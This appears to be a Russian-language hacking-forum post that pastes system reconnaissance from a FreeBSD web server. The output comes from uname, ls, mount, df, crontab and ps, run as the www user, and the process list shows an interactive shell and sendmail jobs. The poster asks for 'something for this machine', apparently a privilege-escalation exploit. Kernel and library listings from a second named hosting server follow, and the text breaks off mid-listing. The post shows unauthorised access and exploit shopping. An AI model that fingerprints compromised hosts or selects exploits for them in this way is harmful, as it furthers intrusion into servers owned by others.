Code: $ uname -a FreeBSD сайт 7.4-RELEASE-p7 FreeBSD 7.4-RELEASE-p7 #3: Fri May 4 12:59:48 YEKT 2012 alex@ сайт:/usr/obj/usr/src/sys/сайт i386 $ ls -la /boot total 3328 drwxr-xr-x 12 root wheel 1024 Aug 4 2013 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. drwxr-xr-x 2 root wheel 28672 Feb 17 2011 GENERIC -r--r--r-- 1 root wheel 7689 May 14 2012 beastie.4th -r--r--r-- 1 root wheel 8192 May 14 2012 boot -r--r--r-- 1 root wheel 512 May 14 2012 boot0 -r--r--r-- 1 root wheel 512 May 14 2012 boot0sio -r--r--r-- 1 root wheel 512 May 14 2012 boot1 -r--r--r-- 1 root wheel 7680 May 14 2012 boot2 -r--r--r-- 1 root wheel 1201 May 14 2012 cdboot drwxr-xr-x 2 root wheel 512 May 14 2012 defaults -r--r--r-- 1 root wheel 1746 Feb 17 2011 device.hints drwxr-xr-x 2 root wheel 512 Feb 17 2011 firmware -r--r--r-- 1 root wheel 2258 May 14 2012 frames.4th -r--r--r-- 1 root wheel 7567 May 14 2012 gptboot -r--r--r-- 1 root wheel 26259 May 14 2012 gptzfsboot drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel drwxr-xr-x 2 root wheel 28672 Mar 30 2011 kernel.GENERIC drwxr-xr-x 2 root wheel 512 Aug 3 2013 kernel.сайт drwxr-xr-x 2 root wheel 12288 Aug 5 2013 kernel.modules drwxr-xr-x 2 root wheel 512 May 14 2012 kernel.old -r-xr-xr-x 1 root wheel 253952 May 14 2012 loader -r--r--r-- 1 root wheel 5865 May 14 2012 loader.4th -rw-r--r-- 1 root wheel 18 Mar 30 2011 loader.conf -rw-r--r-- 1 root wheel 17 Mar 30 2011 loader.conf.old -r--r--r-- 1 root wheel 15219 May 14 2012 loader.help -r-xr-xr-x 1 root wheel 253952 Dec 30 2011 loader.old -r--r--r-- 1 root wheel 392 Feb 17 2011 loader.rc -r--r--r-- 1 root wheel 512 May 14 2012 mbr drwxr-xr-x 2 root wheel 512 Feb 17 2011 modules -r--r--r-- 1 root wheel 512 May 14 2012 pmbr -r--r--r-- 1 root wheel 256000 May 14 2012 pxeboot -r--r--r-- 1 root wheel 699 May 14 2012 screen.4th -r--r--r-- 1 root wheel 35136 May 14 2012 support.4th drwxr-xr-x 2 root wheel 512 Feb 17 2011 zfs -r--r--r-- 1 root wheel 33280 May 14 2012 zfsboot -r-xr-xr-x 1 root wheel 274432 May 
14 2012 zfsloader -r-xr-xr-x 1 root wheel 274432 Dec 30 2011 zfsloader.old $ mount /dev/mfid0a on / (ufs, local, noatime, soft-updates) devfs on /dev (devfs, local) /dev/mfid0e on /usr/local (ufs, local, noatime, soft-updates) /dev/mfid0d on /usr (ufs, local, noatime, soft-updates) /dev/mfid0f on /var (ufs, local, noatime, soft-updates) /dev/mfid0g on /mail (ufs, local, noatime, soft-updates) /dev/mfid0h on /local (ufs, local, noatime, soft-updates) /dev/mfid1s1d on /opt (ufs, local, noatime) /dev/mfid1s1e on /backup (ufs, local, noatime) /dev/md0 on /local/www/сайт/cache (ufs, asynchronous, local, noexec, nosuid) $ df -h Filesystem Size Used Avail Capacity Mounted on /dev/mfid0a 1.9G 419M 1.4G 23% / devfs 1.0K 1.0K 0B 100% /dev /dev/mfid0e 4.8G 4.0K 4.5G 0% /usr/local /dev/mfid0d 4.8G 4.4G 85M 98% /usr /dev/mfid0f 48G 40G 4.8G 89% /var /dev/mfid0g 194G 127G 51G 71% /mail /dev/mfid0h 315G 225G 65G 78% /local /dev/mfid1s1d 291G 28G 240G 10% /opt /dev/mfid1s1e 286G 246G 17G 94% /backup /dev/md0 31M 274K 28M 1% /local/www/сайт/cache $ cat /etc/crontab # /etc/crontab - root's crontab for FreeBSD # # $FreeBSD: src/etc/crontab,v 1.32.24.1.4.1 2010/12/21 17:10:29 kensmith Exp $ # SHELL=/bin/sh PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin # #minute hour mday month wday who command # */5 * * * * root /usr/libexec/atrun # # Save some entropy so that /dev/random can re-seed on boot. */11 * * * * operator /usr/libexec/save-entropy # # Rotate log files every hour, if necessary. 0 * * * * root newsyslog # # Perform daily/weekly/monthly maintenance. 1 3 * * * root periodic daily 15 4 * * 6 root periodic weekly 30 5 1 * * root periodic monthly # # Adjust the time zone if the CMOS clock keeps local time, as opposed to # UTC time. See adjkerntz(8) for details. 1,31 0-5 * * * root adjkerntz -a $ ls -la /libexec total 736 drwxr-xr-x 2 root wheel 512 May 14 2012 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. 
-r-xr-xr-x 1 root wheel 180896 Dec 30 2011 ld-elf.so.1 -r-xr-xr-x 1 root wheel 189184 Feb 17 2011 ld-elf.so.1.old $ ps axfu USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND www 95411 42.9 1.2 54276 41460 ?? S 1:32PM 6:07.03 /usr/local/sbin/ht www 5177 25.5 2.2 100356 74032 ?? R 2:32PM 0:18.89 /usr/local/sbin/ht www 90963 8.9 1.2 54532 41976 ?? S 1:03PM 8:25.48 /usr/local/sbin/ht www 95403 8.4 1.2 54276 41800 ?? R 1:32PM 5:43.07 /usr/local/sbin/ht www 88613 8.3 1.2 54532 41816 ?? S 12:49PM 10:15.64 /usr/local/sbin/ht www 5696 7.9 0.1 3756 2668 ?? S 2:35PM 0:00.02 sendmail: ./t5H9Zj www 5695 7.8 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c /usr/sbin/se www 94821 7.8 1.2 55300 41244 ?? S 1:28PM 6:21.93 /usr/local/sbin/ht www 96019 7.6 1.2 54276 41068 ?? S 1:36PM 5:11.63 /usr/local/sbin/ht www 95914 7.5 1.2 54276 41184 ?? S 1:35PM 5:31.22 /usr/local/sbin/ht www 5458 7.1 0.8 40964 26572 ?? S 2:34PM 0:07.37 /usr/local/sbin/ht www 95698 6.6 1.2 53252 40632 ?? S 1:34PM 5:23.52 /usr/local/sbin/ht www 5689 3.8 0.7 39940 22140 ?? S 2:35PM 0:00.56 /usr/local/sbin/ht www 914 3.6 0.2 8192 6688 ?? R 22May15 1399:37.78 nginx: worker proc www 913 2.9 0.2 9216 7344 ?? S 22May15 1401:01.32 nginx: worker proc www 95287 2.8 1.3 55300 42616 ?? R 1:31PM 6:12.23 /usr/local/sbin/ht www 5692 1.6 0.6 39940 20212 ?? S 2:35PM 0:00.23 /usr/local/sbin/ht www 932 0.0 0.3 36776 10456 ?? I 22May15 0:00.21 /usr/local/sbin/ht www 5702 0.0 0.0 3460 1144 ?? S 2:35PM 0:00.00 sh -c ps axfu www 5703 0.0 0.0 3244 944 ?? R 2:35PM 0:00.00 ps axfu www 20314 0.0 0.0 0 0 ?? Z Mon09AM 0:00.00 <defunct> www 42814 0.0 0.0 0 0 ?? Z Sun11PM 0:00.00 <defunct> www 50717 0.0 0.0 3460 1100 ?? I 8Jun15 0:00.01 /bin/sh -i www 52999 0.0 0.0 3128 700 ?? I 8Jun15 0:02.89 tail -f pureftpd.l www 58328 0.0 0.0 0 0 ?? Z Sun12PM 0:00.05 <defunct> www 89316 0.0 0.0 0 0 ?? Z 3:28PM 0:00.00 <defunct> ls -la /tmp total 1280 drwxrwxrwt 10 root wheel 3072 Jun 17 14:39 . drwxr-xr-x 22 root wheel 512 May 14 2012 .. 
drwxrwxrwt 2 root wheel 512 May 22 17:34 .ICE-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .X11-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .XIM-unix drwxrwxrwt 2 root wheel 512 May 22 17:34 .font-unix -rw------- 1 spamassasin wheel 7221 Nov 25 2013 .spamassassin12210SilOHtmp drwx------ 3 www www 512 Dec 19 2011 fast prw------- 1 root wheel 0 Mar 30 2011 make_fifo_VRxkXE6sJ drwx------ 2 alex wheel 512 Nov 15 2012 mc-alex drwx------ 2 root wheel 512 Jun 2 11:22 mc-root -rw-r--r-- 1 www wheel 0 Jun 8 15:53 overwrites -rw------- 1 root wheel 36 Jun 23 2011 periodic.slLwSSsz08 -rw------- 1 root wheel 48 Jun 23 2011 periodic.vODgX3C8Hg drwxr-xr-x 3 root wheel 512 Apr 9 2011 screens -rw------- 1 root wheel 0 Jun 23 2011 security.MxksURwR $ id uid=80(www) gid=80(www) groups=80(www)
подскажите что нить для этой машинки uname -a Code: Linux mh40.mobyhost.ru 2.6.18-400.1.1.el5 #1 SMP Thu Dec 18 00:59:53 EST 2014 x86_64 x86_64 x86_64 GNU/Linux ls -la --full-time /lib Code: total 17352 drwxr-xr-x 11 root root 4096 2015-06-16 01:09:12.000000000 +0300 . drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 .. -rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libcrypto.so.0.9.8e.hmac lrwxrwxrwx 1 root root 25 2015-05-14 01:08:56.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac -rw-r--r-- 1 root root 65 2015-05-13 13:33:41.000000000 +0300 .libssl.so.0.9.8e.hmac lrwxrwxrwx 1 root root 22 2015-05-14 01:08:56.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac drwxr-xr-x 2 root root 4096 2014-10-01 01:12:30.000000000 +0400 bdevid lrwxrwxrwx 1 root root 14 2014-10-01 01:11:14.000000000 +0400 cpp -> ../usr/bin/cpp drwxr-xr-x 2 root root 4096 2014-10-01 01:11:27.000000000 +0400 firmware drwxr-xr-x 3 root root 4096 2015-01-27 21:28:03.000000000 +0300 i686 drwxr-xr-x 6 root root 4096 2013-01-09 07:14:22.000000000 +0400 kbd -rwxr-xr-x 1 root root 130860 2015-01-27 22:04:53.000000000 +0300 ld-2.5.so lrwxrwxrwx 1 root root 9 2015-01-28 18:11:41.000000000 +0300 ld-linux.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:50.000000000 +0300 ld-lsb.so.3 -> ld-linux.so.2 -rwxr-xr-x 1 root root 7664 2015-01-27 22:04:53.000000000 +0300 libBrokenLocale-2.5.so lrwxrwxrwx 1 root root 22 2015-01-28 18:11:41.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so -rwxr-xr-x 1 root root 16704 2015-01-27 22:04:53.000000000 +0300 libSegFault.so -rwxr-xr-x 1 root root 14128 2015-01-27 22:04:53.000000000 +0300 libanl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:41.000000000 +0300 libanl.so.1 -> libanl-2.5.so lrwxrwxrwx 1 root root 18 2010-02-26 16:19:28.000000000 +0300 libasound.so.2 -> libasound.so.2.0.0 -rwxr-xr-x 1 root root 907328 2009-01-21 06:47:23.000000000 +0300 libasound.so.2.0.0 lrwxrwxrwx 1 root 
root 17 2012-03-13 01:13:26.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0 -rwxr-xr-x 1 root root 95740 2012-02-22 19:10:06.000000000 +0400 libaudit.so.0.0.0 lrwxrwxrwx 1 root root 19 2012-03-13 01:13:26.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0 -rwxr-xr-x 1 root root 58932 2012-02-22 19:10:06.000000000 +0400 libauparse.so.0.0.0 lrwxrwxrwx 1 root root 15 2014-10-01 01:12:22.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0 -rwxr-xr-x 1 root root 36740 2014-09-18 14:12:28.000000000 +0400 libblkid.so.1.0 -rwxr-xr-x 1 root root 1706208 2015-01-27 22:04:54.000000000 +0300 libc-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libc.so.6 -> libc-2.5.so lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 1 root root 11560 2007-03-14 21:15:10.000000000 +0300 libcap.so.1.10 -rwxr-xr-x 1 root root 191708 2015-01-27 22:04:55.000000000 +0300 libcidn-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 1 root root 17 2014-10-01 01:12:22.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 1 root root 6364 2014-09-18 14:12:28.000000000 +0400 libcom_err.so.2.1 -rwxr-xr-x 1 root root 45432 2015-01-27 22:04:55.000000000 +0300 libcrypt-2.5.so lrwxrwxrwx 1 root root 15 2015-01-28 18:11:42.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 1 root root 1299328 2015-05-13 13:33:41.000000000 +0300 libcrypto.so.0.9.8e lrwxrwxrwx 1 root root 14 2009-09-29 10:32:08.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6 lrwxrwxrwx 1 root root 19 2015-05-14 01:08:56.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e -rwxr-xr-x 1 root root 838860 2007-01-07 08:37:48.000000000 +0300 libdb-4.1.so -rwxr-xr-x 1 root root 934132 2007-01-07 08:37:48.000000000 +0300 libdb-4.2.so -rwxr-xr-x 1 root root 1010204 2010-07-12 20:11:02.000000000 +0400 libdb-4.3.so -rwxr-xr-x 1 root root 905704 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.1.so 
-rwxr-xr-x 1 root root 1019472 2007-01-07 08:37:48.000000000 +0300 libdb_cxx-4.2.so lrwxrwxrwx 1 root root 18 2013-10-20 01:11:03.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 257492 2013-10-02 01:59:51.000000000 +0400 libdbus-1.so.3.4.0 -r--r--r-- 1 root root 45098 2014-11-18 13:11:21.000000000 +0300 libdevmapper-event.a lrwxrwxrwx 1 root root 26 2014-11-19 01:08:51.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02 -r-xr-xr-x 1 root root 18488 2014-11-18 13:11:29.000000000 +0300 libdevmapper-event.so.1.02 -r--r--r-- 1 root root 496324 2014-11-18 13:11:15.000000000 +0300 libdevmapper.a lrwxrwxrwx 1 root root 20 2014-11-19 01:08:51.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02 -r-xr-xr-x 1 root root 163292 2014-11-18 13:11:29.000000000 +0300 libdevmapper.so.1.02 -rwxr-xr-x 1 root root 20668 2015-01-27 22:04:55.000000000 +0300 libdl-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 libdl.so.2 -> libdl-2.5.so lrwxrwxrwx 1 root root 13 2014-10-01 01:12:22.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3 -rwxr-xr-x 1 root root 20192 2014-09-18 14:12:28.000000000 +0400 libe2p.so.2.3 lrwxrwxrwx 1 root root 17 2012-06-14 01:12:14.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0 -rwxr-xr-x 1 root root 135932 2012-06-13 18:35:31.000000000 +0400 libexpat.so.0.5.0 lrwxrwxrwx 1 root root 16 2014-10-01 01:12:22.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4 -rwxr-xr-x 1 root root 113892 2014-09-18 14:12:28.000000000 +0400 libext2fs.so.2.4 -rwxr-xr-x 1 root root 45192 2014-09-18 07:05:57.000000000 +0400 libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 28 2014-10-01 01:12:23.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1 lrwxrwxrwx 1 root root 23 2009-09-29 10:32:11.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 644472 2009-03-25 04:52:17.000000000 +0300 libglib-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 
libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 11396 2009-03-25 04:52:17.000000000 +0300 libgmodule-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:08.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 259128 2009-03-25 04:52:17.000000000 +0300 libgobject-2.0.so.0.1200.3 lrwxrwxrwx 1 root root 26 2009-09-29 10:32:11.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 14660 2009-03-25 04:52:17.000000000 +0300 libgthread-2.0.so.0.1200.3 -rwxr-xr-x 1 root root 27964 2007-03-15 06:26:22.000000000 +0300 libiw.so.28 -rwxr-xr-x 1 root root 6404 2007-01-06 10:57:38.000000000 +0300 libkeyutils-1.2.so lrwxrwxrwx 1 root root 18 2009-09-29 10:32:08.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so -rwxr-xr-x 1 root root 216544 2015-01-27 22:04:55.000000000 +0300 libm-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:42.000000000 +0300 libm.so.6 -> libm-2.5.so -rwxr-xr-x 1 root root 109740 2015-01-27 22:04:55.000000000 +0300 libnsl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 18:11:42.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so -rwxr-xr-x 1 root root 36468 2015-01-27 22:04:55.000000000 +0300 libnss_compat-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:42.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so -rwxr-xr-x 1 root root 827876 2015-01-05 13:12:47.000000000 +0300 libnss_db-2.2.so lrwxrwxrwx 1 root root 16 2015-01-06 01:08:48.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so -rwxr-xr-x 1 root root 21948 2015-01-27 22:04:56.000000000 +0300 libnss_dns-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so -rwxr-xr-x 1 root root 50848 2015-01-27 22:04:56.000000000 +0300 libnss_files-2.5.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so -rwxr-xr-x 1 root root 22764 2015-01-27 22:04:56.000000000 +0300 libnss_hesiod-2.5.so lrwxrwxrwx 1 root root 
20 2015-01-28 18:11:42.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so -rwxr-xr-x 1 root root 3217504 2015-06-15 15:37:43.000000000 +0300 libnss_ldap-2.5.so lrwxrwxrwx 1 root root 18 2015-06-16 01:09:12.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so -rwxr-xr-x 1 root root 46624 2015-01-27 22:04:56.000000000 +0300 libnss_nis-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so -rwxr-xr-x 1 root root 55804 2015-01-27 22:04:56.000000000 +0300 libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 21 2015-01-28 18:11:42.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so lrwxrwxrwx 1 root root 16 2015-05-28 01:09:09.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5 -rwxr-xr-x 1 root root 43020 2015-05-27 16:48:30.000000000 +0300 libpam.so.0.81.5 lrwxrwxrwx 1 root root 21 2015-05-28 01:09:09.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2 -rwxr-xr-x 1 root root 8624 2015-05-27 16:48:30.000000000 +0300 libpam_misc.so.0.81.2 lrwxrwxrwx 1 root root 17 2015-05-28 01:09:09.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0 -rwxr-xr-x 1 root root 9868 2015-05-27 16:48:30.000000000 +0300 libpamc.so.0.81.0 lrwxrwxrwx 1 root root 16 2013-10-20 01:10:29.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1 -rwxr-xr-x 1 root root 127760 2013-10-01 22:18:22.000000000 +0400 libpcre.so.0.0.1 -rwxr-xr-x 1 root root 137944 2015-01-27 22:04:56.000000000 +0300 libpthread-2.5.so lrwxrwxrwx 1 root root 17 2015-01-28 18:11:42.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so -rwxr-xr-x 1 root root 84904 2015-01-27 22:04:56.000000000 +0300 libresolv-2.5.so lrwxrwxrwx 1 root root 16 2015-01-28 18:11:42.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so -rwxr-xr-x 1 root root 48156 2015-01-27 22:04:56.000000000 +0300 librt-2.5.so lrwxrwxrwx 1 root root 12 2015-01-28 18:11:42.000000000 +0300 librt.so.1 -> librt-2.5.so -rwxr-xr-x 1 root root 91892 2011-03-06 07:51:56.000000000 +0300 libselinux.so.1 -rwxr-xr-x 1 root root 
243928 2010-03-31 12:26:18.000000000 +0400 libsepol.so.1 lrwxrwxrwx 1 root root 12 2014-10-01 01:12:22.000000000 +0400 libss.so.2 -> libss.so.2.0 -rwxr-xr-x 1 root root 19008 2014-09-18 14:12:28.000000000 +0400 libss.so.2.0 -rwxr-xr-x 1 root root 300636 2015-05-13 13:33:41.000000000 +0300 libssl.so.0.9.8e lrwxrwxrwx 1 root root 11 2009-09-29 10:32:08.000000000 +0400 libssl.so.4 -> libssl.so.6 lrwxrwxrwx 1 root root 16 2015-05-14 01:08:56.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e lrwxrwxrwx 1 root root 19 2009-09-29 10:32:12.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 11636 2007-01-06 16:01:17.000000000 +0300 libtermcap.so.2.0.8 -rwxr-xr-x 1 root root 33852 2015-01-27 22:04:56.000000000 +0300 libthread_db-1.0.so lrwxrwxrwx 1 root root 19 2015-01-28 18:11:42.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so -rwxr-xr-x 1 root root 13492 2015-01-27 22:04:56.000000000 +0300 libutil-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:42.000000000 +0300 libutil.so.1 -> libutil-2.5.so lrwxrwxrwx 1 root root 14 2014-10-01 01:12:22.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2 -rwxr-xr-x 1 root root 14472 2014-09-18 14:12:28.000000000 +0400 libuuid.so.1.2 lrwxrwxrwx 1 root root 22 2014-10-01 01:12:29.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0 -rwxr-xr-x 1 root root 37032 2014-09-17 23:19:08.000000000 +0400 libvolume_id.so.0.66.0 lrwxrwxrwx 1 root root 16 2009-10-23 01:10:46.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6 -rwxr-xr-x 1 root root 31344 2009-09-22 02:37:30.000000000 +0400 libwrap.so.0.7.6 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:38.000000000 +0400 libz.so -> libz.so.1.2.3 lrwxrwxrwx 1 root root 13 2013-01-18 01:13:13.000000000 +0400 libz.so.1 -> libz.so.1.2.3 -rwxr-xr-x 1 root root 75088 2012-07-17 12:32:17.000000000 +0400 libz.so.1.2.3 drwxr-xr-x 2 root root 4096 2011-04-10 01:15:39.000000000 +0400 lsb drwxr-xr-x 12 root root 4096 2014-12-25 01:09:56.000000000 +0300 modules drwxr-xr-x 3 root root 
4096 2015-01-28 18:11:42.000000000 +0300 rtkaio drwxr-xr-x 4 root root 4096 2015-06-16 01:09:12.000000000 +0300 security drwxr-xr-x 3 root root 4096 2015-07-01 04:23:58.000000000 +0300 udev ls -la --full-time /lib64 Code: total 25552 drwxr-xr-x 8 root root 4096 2015-07-01 04:24:40.000000000 +0300 . drwxr-xr-x 28 root root 4096 2015-06-30 23:01:02.000000000 +0300 .. -rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libcrypto.so.0.9.8e.hmac lrwxrwxrwx 1 root root 25 2015-05-14 01:08:43.000000000 +0300 .libcrypto.so.6.hmac -> .libcrypto.so.0.9.8e.hmac -rw-r--r-- 1 root root 65 2015-05-12 23:58:28.000000000 +0300 .libssl.so.0.9.8e.hmac lrwxrwxrwx 1 root root 22 2015-05-14 01:08:43.000000000 +0300 .libssl.so.6.hmac -> .libssl.so.0.9.8e.hmac drwxr-xr-x 2 root root 4096 2014-10-01 01:11:16.000000000 +0400 bdevid drwxr-xr-x 2 root root 4096 2015-01-29 04:17:01.000000000 +0300 dbus-1 drwxr-xr-x 2 root root 4096 2014-10-01 01:10:52.000000000 +0400 device-mapper drwxr-xr-x 2 root root 4096 2012-10-31 01:09:48.000000000 +0400 iptables -rwxr-xr-x 1 root root 144776 2015-01-27 20:33:48.000000000 +0300 ld-2.5.so lrwxrwxrwx 1 root root 9 2015-01-28 18:11:22.000000000 +0300 ld-linux-x86-64.so.2 -> ld-2.5.so lrwxrwxrwx 1 root root 20 2015-01-28 18:11:50.000000000 +0300 ld-lsb-x86-64.so -> ld-linux-x86-64.so.2 lrwxrwxrwx 1 root root 20 2011-04-10 01:15:38.000000000 +0400 ld-lsb-x86-64.so.3 -> ld-linux-x86-64.so.2 -rwxr-xr-x 1 root root 8904 2015-01-27 20:33:48.000000000 +0300 libBrokenLocale-2.5.so lrwxrwxrwx 1 root root 22 2015-01-28 18:11:22.000000000 +0300 libBrokenLocale.so.1 -> libBrokenLocale-2.5.so -rwxr-xr-x 1 root root 22336 2015-01-27 20:33:48.000000000 +0300 libSegFault.so lrwxrwxrwx 1 root root 15 2012-03-13 01:11:51.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0 -rwxr-xr-x 1 root root 27920 2012-02-22 17:57:53.000000000 +0400 libacl.so.1.1.0 -rwxr-xr-x 1 root root 20064 2015-01-27 20:33:48.000000000 +0300 libanl-2.5.so lrwxrwxrwx 1 root root 13 2015-01-28 
18:11:22.000000000 +0300 libanl.so.1 -> libanl-2.5.so lrwxrwxrwx 1 root root 18 2009-10-06 15:17:14.000000000 +0400 libasound.so.2 -> libasound.so.2.0.0 -rwxr-xr-x 1 root root 907552 2009-01-21 06:42:23.000000000 +0300 libasound.so.2.0.0 lrwxrwxrwx 1 root root 16 2009-09-29 10:33:40.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0 -rwxr-xr-x 1 root root 17888 2007-01-06 08:09:58.000000000 +0300 libattr.so.1.1.0 lrwxrwxrwx 1 root root 17 2012-03-13 01:11:49.000000000 +0400 libaudit.so.0 -> libaudit.so.0.0.0 -rwxr-xr-x 1 root root 98920 2012-02-22 19:10:07.000000000 +0400 libaudit.so.0.0.0 lrwxrwxrwx 1 root root 19 2012-03-13 01:11:49.000000000 +0400 libauparse.so.0 -> libauparse.so.0.0.0 -rwxr-xr-x 1 root root 62200 2012-02-22 19:10:07.000000000 +0400 libauparse.so.0.0.0 lrwxrwxrwx 1 root root 15 2014-10-01 01:10:44.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0 -rwxr-xr-x 1 root root 43840 2014-09-18 14:12:06.000000000 +0400 libblkid.so.1.0 -rwxr-xr-x 1 root root 1726296 2015-01-27 20:33:48.000000000 +0300 libc-2.5.so lrwxrwxrwx 1 root root 11 2015-01-28 18:11:22.000000000 +0300 libc.so.6 -> libc-2.5.so lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcap.so.1 -> libcap.so.1.10 -rwxr-xr-x 1 root root 17384 2007-03-14 21:13:01.000000000 +0300 libcap.so.1.10 -rwxr-xr-x 1 root root 197744 2015-01-27 20:33:48.000000000 +0300 libcidn-2.5.so lrwxrwxrwx 1 root root 14 2015-01-28 18:11:22.000000000 +0300 libcidn.so.1 -> libcidn-2.5.so lrwxrwxrwx 1 root root 17 2014-10-01 01:10:44.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1 -rwxr-xr-x 1 root root 10096 2014-09-18 14:12:06.000000000 +0400 libcom_err.so.2.1 -rwxr-xr-x 1 root root 48600 2015-01-27 20:33:48.000000000 +0300 libcrypt-2.5.so lrwxrwxrwx 1 root root 15 2015-01-28 18:11:22.000000000 +0300 libcrypt.so.1 -> libcrypt-2.5.so -rwxr-xr-x 1 root root 1369312 2015-05-12 23:58:28.000000000 +0300 libcrypto.so.0.9.8e lrwxrwxrwx 1 root root 14 2009-09-29 10:33:39.000000000 +0400 libcrypto.so.4 -> 
libcrypto.so.6 lrwxrwxrwx 1 root root 19 2015-05-14 01:08:43.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e -rwxr-xr-x 1 root root 831880 2007-01-07 06:09:55.000000000 +0300 libdb-4.1.so -rwxr-xr-x 1 root root 927720 2007-01-07 06:09:55.000000000 +0300 libdb-4.2.so -rwxr-xr-x 1 root root 1008656 2010-07-12 20:09:33.000000000 +0400 libdb-4.3.so -rwxr-xr-x 1 root root 901352 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.1.so -rwxr-xr-x 1 root root 1011880 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.2.so lrwxrwxrwx 1 root root 18 2013-10-20 01:10:44.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0 -rwxr-xr-x 1 root root 243288 2013-10-02 01:59:24.000000000 +0400 libdbus-1.so.3.4.0 lrwxrwxrwx 1 root root 31 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02 -r-xr-xr-x 1 root root 6712 2014-09-17 21:57:55.000000000 +0400 libdevmapper-event-lvm2.so.2.02 lrwxrwxrwx 1 root root 46 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so lrwxrwxrwx 1 root root 48 2014-10-01 